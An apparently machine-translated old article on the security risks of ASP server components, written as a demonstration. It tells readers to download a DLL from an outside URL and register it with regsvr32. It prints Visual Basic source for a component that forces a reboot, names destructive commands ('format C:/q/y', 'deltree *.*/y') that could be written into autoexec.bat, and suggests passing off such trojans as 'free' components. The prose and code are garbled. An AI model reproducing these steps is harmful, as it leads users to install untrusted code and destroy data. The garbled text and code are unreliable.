Security | Issues Microsoft's ASP (Active Server Page) is simple, easy to use, features, scalability and other powerful features of users and most of the network management favorite, a great substitute for CGI trend. But I would like to say to you, if the use of ASP, your network security also greatly reduced! Before I go on, please complete the following steps:
1. Download the file "Http://home.gbsource.net/xuankong/dll.zip" and unzip the Test.dll file to "C:\Windows\System" (if you are using NT, Please copy to the corresponding directory);
2. Next Open "Start/Run" menu to enter "regsvr32 test.dll" command;
3. Copy uncompressed package of the index.asp to your server directory (if you are using PWS ' Personal Web Server ' debug can copy to "C:\Inetpub\wwwroot", NT please copy to the corresponding directory);
4. For a machine to browse index.asp files with IE to see (you see the error code, but in fact, the program has already run), you return to your machine to see if the C:\ more than a file?! A file called "Xuankong.dat" (in fact, if I wish, your C:\autoexec.bat file can be opened by me and written to some of the "format C:/q/y" or "deltree *.*/y" commands, and the next time you restart the machine. Hey...... )。
Let's see what's going on. The DLL files you just copied are actually a component I developed using Visul Basic 5.0:
1. Open VB5.0 Create a new "ActiveX dll" file and enter the following code.
Private Declare Function ExitWindowsEx lib″user32″_
(ByVal uflags as Long, ByVal dwreserved as Long) _
As Long Sub Xuankong () Please don't add ″private″
a$ = InputBox (″ Please enter your name, if your input is ″xuankong″″+ Chr (10) CHR will generate a +″ file in your system ″xuankong.dat″ ″+ (a) + CHR (13) Chr otherwise Your machine may reboot ″,″ Please enter ″,″xuankong″)
If a$ =″xuankong″then open″c:\xuankong.dat″for Append as # Write #1,″ My friend, this is a test program for an ASP component ″write #1,″hello wor Ld! This is a test″write #1,″ if you see this file indicates that the test was successful!!! ″else exitwindowsex &h43, 0′ use API functions to reboot machine end If Close # end Sub
2. Change the project name to a DLL, change the class module to test, and then generate the DLL file into the C:\Windows\System directory below the project.
3. Create a new index.asp file to enter the following code.
<% set Rs=server.createobject (″dll.test″)%>
<% Set Rs1=rs.xuankong rs1.execute%>
4. Copy index.asp to your server and debug as described above! Well, how do you feel if you have finished debugging??? If you are using VC + +, Visual Java development (the components they develop can be more powerful), if you change the above VB code, add to some FTP components, e-mail components, HTTP components, chat room components, counter components ... (All the components that can be input/output, unable to input/output components of the destructive power of a certain limit), and then add a nice name to these components "free ..." You are not fooled (hehe!) Maybe you've been fooled, the world is free things are good things!!! *^v^*)?
The above is the ASP component security issues! In addition, if some authors inadvertently leave the system bug! when writing ASP components, it is even more difficult to be found!
Description: This article only represents a personal point of view. The code provided in this article is debugged in Windows 98 with PWS and visual Basic 5.0, and if you have problems building an ASP component that cannot be compiled, turn off your PWS. Do you have any ideas or comments please e-mail:xuankong@swau.edu.cn.
